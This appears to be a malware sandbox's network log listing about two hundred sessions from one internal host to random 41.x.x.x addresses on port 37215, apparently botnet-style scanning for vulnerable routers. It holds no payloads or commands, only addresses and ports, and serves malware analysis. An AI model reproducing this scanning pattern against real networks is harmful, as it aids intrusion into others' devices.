                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15135192.168.2.155964641.205.145.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15136192.168.2.153710641.54.94.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15137192.168.2.154453241.174.34.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15138192.168.2.154666041.96.76.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15139192.168.2.153360841.9.160.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15140192.168.2.154555041.152.201.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15141192.168.2.155335041.244.201.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15142192.168.2.153528041.31.151.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15143192.168.2.155756441.34.132.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15144192.168.2.155346241.122.129.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15145192.168.2.155511041.221.33.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15146192.168.2.154518841.47.206.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15147192.168.2.155918041.173.194.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15148192.168.2.155781241.155.135.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15149192.168.2.155526641.146.68.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15150192.168.2.154172041.144.70.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15151192.168.2.155108441.229.227.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15152192.168.2.155287641.89.210.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15153192.168.2.153845641.118.5.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15154192.168.2.154366841.174.54.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15155192.168.2.155004041.223.163.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15156192.168.2.155106041.120.193.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15157192.168.2.153313041.144.46.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15158192.168.2.154454041.150.188.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15159192.168.2.155830441.221.244.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15160192.168.2.153585441.196.101.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15161192.168.2.155282041.174.111.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15162192.168.2.154682841.155.134.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15163192.168.2.154195841.3.105.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15164192.168.2.154877041.178.5.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15165192.168.2.153946241.90.63.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15166192.168.2.155040641.175.162.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15167192.168.2.155893241.255.24.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15168192.168.2.154556841.155.29.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15169192.168.2.154546241.131.29.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15170192.168.2.155317041.86.2.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15171192.168.2.154407441.2.127.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15172192.168.2.155864241.172.148.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15173192.168.2.155812841.177.118.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15174192.168.2.155540041.213.11.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15175192.168.2.154552641.68.9.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15176192.168.2.153730841.149.80.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15177192.168.2.155446641.117.214.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15178192.168.2.154523641.105.67.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15179192.168.2.153346041.194.217.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15180192.168.2.155866641.93.221.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15181192.168.2.154698041.30.74.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15182192.168.2.154621641.60.38.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15183192.168.2.154382841.216.163.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15184192.168.2.153479241.83.170.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15185192.168.2.154012841.115.188.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15186192.168.2.154472841.221.25.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15187192.168.2.154790041.24.181.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15188192.168.2.154858441.70.177.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15189192.168.2.155607441.195.86.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15190192.168.2.154962041.79.62.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15191192.168.2.154805641.16.205.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15192192.168.2.154498041.74.152.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15193192.168.2.155378441.63.204.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15194192.168.2.153521041.159.56.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15195192.168.2.154378041.58.30.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15196192.168.2.155623841.173.249.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15197192.168.2.155269441.190.220.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15198192.168.2.154268641.109.5.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15199192.168.2.153890041.123.220.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15200192.168.2.153972241.173.56.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15201192.168.2.153650241.113.246.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15202192.168.2.155711041.80.34.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15203192.168.2.154246641.170.99.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15204192.168.2.154786041.213.145.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15205192.168.2.155442441.68.169.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15206192.168.2.154313441.162.182.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15207192.168.2.154674641.46.70.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15208192.168.2.154558841.148.242.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15209192.168.2.153815041.153.248.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15210192.168.2.155241641.170.31.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15211192.168.2.153314441.57.199.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15212192.168.2.154371041.246.232.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15213192.168.2.154974441.215.200.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15214192.168.2.155509441.208.90.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15215192.168.2.155660441.194.198.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15216192.168.2.153474041.75.127.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15217192.168.2.155488041.253.173.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15218192.168.2.155069441.248.123.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15219192.168.2.154284241.123.215.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15220192.168.2.155588641.83.217.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15221192.168.2.154479841.36.2.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15222192.168.2.155090441.220.105.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15223192.168.2.154827441.42.121.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15224192.168.2.154302441.55.239.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15225192.168.2.153554441.22.48.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15226192.168.2.155626641.107.66.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15227192.168.2.153393041.56.114.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15228192.168.2.154617241.186.249.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15229192.168.2.153334241.155.245.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15230192.168.2.154430841.13.159.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15231192.168.2.154670241.53.26.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15232192.168.2.155218641.27.193.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15233192.168.2.155959441.9.152.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15234192.168.2.154433641.25.249.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15235192.168.2.154457841.188.164.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15236192.168.2.155130041.170.172.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15237192.168.2.153996241.82.233.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15238192.168.2.155820041.120.198.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15239192.168.2.154632041.79.196.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15240192.168.2.154199641.181.41.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15241192.168.2.155607241.123.221.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15242192.168.2.154629641.151.219.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15243192.168.2.154152841.17.130.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15244192.168.2.154259841.109.95.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15245192.168.2.154039841.42.189.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15246192.168.2.153967841.41.180.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15247192.168.2.154456441.131.232.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15248192.168.2.153967641.8.129.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15249192.168.2.153834641.69.134.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15250192.168.2.153630041.63.14.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15251192.168.2.153491041.54.37.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15252192.168.2.155923041.183.128.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15253192.168.2.154828641.232.159.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15254192.168.2.154403841.107.239.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15255192.168.2.153479041.122.175.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15256192.168.2.155291241.61.153.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15257192.168.2.154527241.231.136.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15258192.168.2.155469641.7.13.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15259192.168.2.154632641.127.144.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15260192.168.2.154735641.89.125.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15261192.168.2.153917441.171.255.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15262192.168.2.155031641.38.8.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15263192.168.2.155804841.113.183.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15264192.168.2.155125241.30.79.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15265192.168.2.153832641.165.159.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15266192.168.2.153477041.179.64.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15267192.168.2.155802441.140.4.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15268192.168.2.153779841.30.220.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15269192.168.2.153639041.144.205.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15270192.168.2.153399441.127.149.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15271192.168.2.154084041.177.161.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15272192.168.2.154087041.11.223.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15273192.168.2.155326441.31.224.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15274192.168.2.153465241.150.4.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15275192.168.2.154808241.226.236.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15276192.168.2.155224841.79.164.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15277192.168.2.155637041.3.207.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15278192.168.2.155414841.10.119.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15279192.168.2.153887041.154.13.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15280192.168.2.155103041.176.75.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15281192.168.2.155544841.234.189.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15282192.168.2.153599241.96.84.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15283192.168.2.155923641.27.163.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15284192.168.2.154930041.37.67.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15285192.168.2.154452841.217.19.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15286192.168.2.153982641.129.179.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15287192.168.2.154956241.8.177.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15288192.168.2.153748441.26.158.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15289192.168.2.155955241.192.188.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15290192.168.2.155324641.126.253.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15291192.168.2.155697441.126.31.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15292192.168.2.153744641.100.161.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15293192.168.2.153533841.5.35.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15294192.168.2.155038241.93.131.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15295192.168.2.154831641.110.117.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15296192.168.2.153563041.145.240.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15297192.168.2.153987841.21.141.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15298192.168.2.154552841.241.11.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15299192.168.2.155611441.195.93.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15300192.168.2.153961841.148.158.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15301192.168.2.154068041.156.109.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15302192.168.2.153877041.40.70.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15303192.168.2.154870841.209.42.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15304192.168.2.154886241.214.182.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15305192.168.2.154630641.102.26.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15306192.168.2.154897841.139.151.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15307192.168.2.155105841.158.194.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15308192.168.2.155237641.173.218.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15309192.168.2.153790441.22.64.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15310192.168.2.153466041.72.23.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15311192.168.2.153529441.33.25.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15312192.168.2.155877641.255.90.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15313192.168.2.155398441.158.41.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15314192.168.2.155592841.177.206.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15315192.168.2.154388441.125.162.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15316192.168.2.154329041.203.121.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15317192.168.2.153737641.82.5.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15318192.168.2.154024441.71.116.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15319192.168.2.153966041.97.20.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15320192.168.2.153428641.12.142.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15321192.168.2.153326441.222.37.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15322192.168.2.155023241.137.194.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15323192.168.2.155932241.125.180.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15324192.168.2.155343641.86.235.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15325192.168.2.154444441.29.126.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15326192.168.2.153599641.158.79.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15327192.168.2.154752641.39.143.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15328192.168.2.154616241.97.77.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15329192.168.2.154241241.45.130.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15330192.168.2.154691441.76.103.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15331192.168.2.154147041.20.3.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15332192.168.2.153324641.239.86.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15333192.168.2.155314841.89.3.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15334192.168.2.153749241.120.96.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15335192.168.2.156014441.33.85.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15336192.168.2.154439041.163.251.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
